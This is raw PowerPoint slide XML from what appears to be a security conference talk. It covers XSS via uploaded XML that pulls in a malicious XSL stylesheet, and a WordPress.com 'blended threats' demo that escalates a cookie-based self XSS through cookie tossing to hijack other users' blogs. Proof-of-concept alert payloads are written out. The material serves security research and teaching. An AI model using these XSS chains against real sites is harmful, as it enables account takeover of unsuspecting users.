              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>(500) Ha. My 500. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Down Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3886200" y="4330782"/>
            <a:ext cx="3429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616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0800"/>
            <a:ext cx="8229600" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>if XML can be uploaded and downloaded?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4211896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Technique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Cross-Site Scripting with XML+XSL pair</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8305800" cy="2057400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Upload an XML document that points to a second XSL transform on the same domain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>The browser will automatically perform the transform and render HTML/execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="495300" y="4162335"/>
            <a:ext cx="3352800" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;?xml version="1.0"?&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>xml-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> type="text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://vulnerabledomain.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>evilxsl.xsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="3505200"/>
            <a:ext cx="4572000" cy="2800767"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> &lt;?xml version="1.0" encoding="utf-8" ?&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xsl:stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> version="1.0" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xmlns:xsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>="http://www.w3.org/1999/XSL/Transform" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xmlns:msxsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>urn:schemas-microsoft-com:xslt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>" exclude-result-prefixes="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>msxsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xsl:template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> match="/"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>script&gt;alert('hello </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>from XSS!')&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xsl:template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1"/>
              <a:t>xsl:stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="3505199"/>
            <a:ext cx="3581400" cy="28007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267200" y="3505199"/>
            <a:ext cx="4648200" cy="28007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295399" y="6378059"/>
            <a:ext cx="1314655" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Firstxml.xml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5771945" y="6412468"/>
            <a:ext cx="1040606" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Evilxsl.xsl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4039386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95400"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Blended Threats Demo</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1469971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err="1" smtClean="0"/>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> comes in two flavors:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Download the software and deploy it yourself (on-premise)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Cloud service on wordpress.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> we want to own this </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>End Game: Obtain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> execution in any subdomain of wordpress.com via XSS, so we can take over anyone’s blog just by getting them to visit our website.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="WordPress logo.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334000"/>
            <a:ext cx="3733800" cy="851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97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01535"/>
            <a:ext cx="7696200" cy="574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8906"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>First, Rich Found a Cookie Based Reflected XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="2209800"/>
            <a:ext cx="4648200" cy="304800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="539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p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3733800" y="4953000"/>
            <a:ext cx="2895600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="539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57831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Clickjacking is Lame</a:t>
            </a:r>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2076450"/>
            <a:ext cx="76866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85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06" y="800100"/>
            <a:ext cx="731222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8906"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Burp Found This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>oo…Not Exploitable, Right?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="5334000"/>
            <a:ext cx="6934200" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="539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4" name="Straight Arrow Connector 3"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4800600" y="2514600"/>
            <a:ext cx="152400" cy="2819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3773384" y="1060999"/>
            <a:ext cx="4114800" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“…the application's behavior is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0"/>
              <a:t>not trivial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to exploit in an attack against another user…this limitation considerably mitigates the impact</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>of the vulnerability…”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161685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5321" y="1301696"/>
            <a:ext cx="3581400" cy="1447685"/>
            <a:chOff x="425321" y="1301696"/>
            <a:chExt cx="3581400" cy="1447685"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="425321" y="1301696"/>
              <a:ext cx="3581400" cy="144768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 name="Picture 2" descr="WordPress logo.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25" y="1606496"/>
              <a:ext cx="2362200" cy="538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6525" y="2145078"/>
              <a:ext cx="2424510" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>attacker.wordpress.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5115061" y="5085931"/>
            <a:ext cx="3886200" cy="1539922"/>
            <a:chOff x="5115061" y="5085931"/>
            <a:chExt cx="3886200" cy="1539922"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5115061" y="5085931"/>
              <a:ext cx="3886200" cy="153992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6" name="Picture 2" descr="WordPress logo.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1602" y="5537834"/>
              <a:ext cx="2362200" cy="5385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33589" y="6092364"/>
              <a:ext cx="3232552" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" smtClean="0"/>
                <a:t>fictionalcelebrity.wordpress.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2069" name="Group 2068"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6760058" y="3842938"/>
            <a:ext cx="1551104" cy="1198929"/>
            <a:chOff x="792040" y="5069473"/>
            <a:chExt cx="1551104" cy="1198929"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="TextBox 57"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="792040" y="5069473"/>
              <a:ext cx="1551104" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                <a:t>Exploitable XSS</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="U-Turn Arrow 58"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="907787" y="5443381"/>
              <a:ext cx="1319611" cy="825021"/>
            </a:xfrm>
            <a:prstGeom prst="uturnArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 25000"/>
                <a:gd name="adj2" fmla="val 25000"/>
                <a:gd name="adj3" fmla="val 25000"/>
                <a:gd name="adj4" fmla="val 43750"/>
                <a:gd name="adj5" fmla="val 10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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2062" name="Group 2061"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2216021" y="2724739"/>
            <a:ext cx="2664542" cy="2664542"/>
            <a:chOff x="2216021" y="2724739"/>
            <a:chExt cx="2664542" cy="2664542"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2055" name="Picture 7" descr="C:\Users\jesseou.REDMOND\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9SK4SXCG\MC90044173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216021" y="2724739"/>
              <a:ext cx="2664542" cy="26645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2.bp.blogspot.com/-i_7-wu_NZsU/Th2wjiXAgBI/AAAAAAAAHLA/iPaA2tsDFMw/s400/javascrip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019" y="3595229"/>
              <a:ext cx="890488" cy="89048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itle 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Paparazzi vs. Fictional Celebrity</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3959593" y="4178728"/>
            <a:ext cx="2076935" cy="1917272"/>
            <a:chOff x="3959593" y="4178728"/>
            <a:chExt cx="2076935" cy="1917272"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2057" name="Picture 9" descr="C:\Users\jesseou.REDMOND\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DDG8LCS6\MC90043485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2028" y="4381500"/>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959593" y="4178728"/>
              <a:ext cx="2024913" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                  <a:latin typeface="Aharoni" pitchFamily="2" charset="-79"/>
                  <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
                </a:rPr>
                <a:t>Same Origin Policy</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Aharoni" pitchFamily="2" charset="-79"/>
                <a:cs typeface="Aharoni" pitchFamily="2" charset="-79"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="27" name="Straight Arrow Connector 26"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3959593" y="1875787"/>
            <a:ext cx="1603007"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5562600" y="1569879"/>
            <a:ext cx="3438661" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If Bad Guy could execute script in his </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>own domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>He could, however, cookie toss over to fictionalcelebrity.wordpress.com and exploit the “self XSS”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2068" name="Group 2067"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6179002" y="3840174"/>
            <a:ext cx="3102208" cy="1209636"/>
            <a:chOff x="6179002" y="3840174"/>
            <a:chExt cx="3102208" cy="1209636"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6179002" y="3840174"/>
              <a:ext cx="3102208" cy="338554"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
                <a:t>Non-Exploitable Cookie Self XSS</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2053" name="U-Turn Arrow 2052"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6875805" y="4224789"/>
              <a:ext cx="1319611" cy="825021"/>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51" name="Group 2050"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3687043" y="2480091"/>
            <a:ext cx="808757" cy="637560"/>
            <a:chOff x="509229" y="3586828"/>
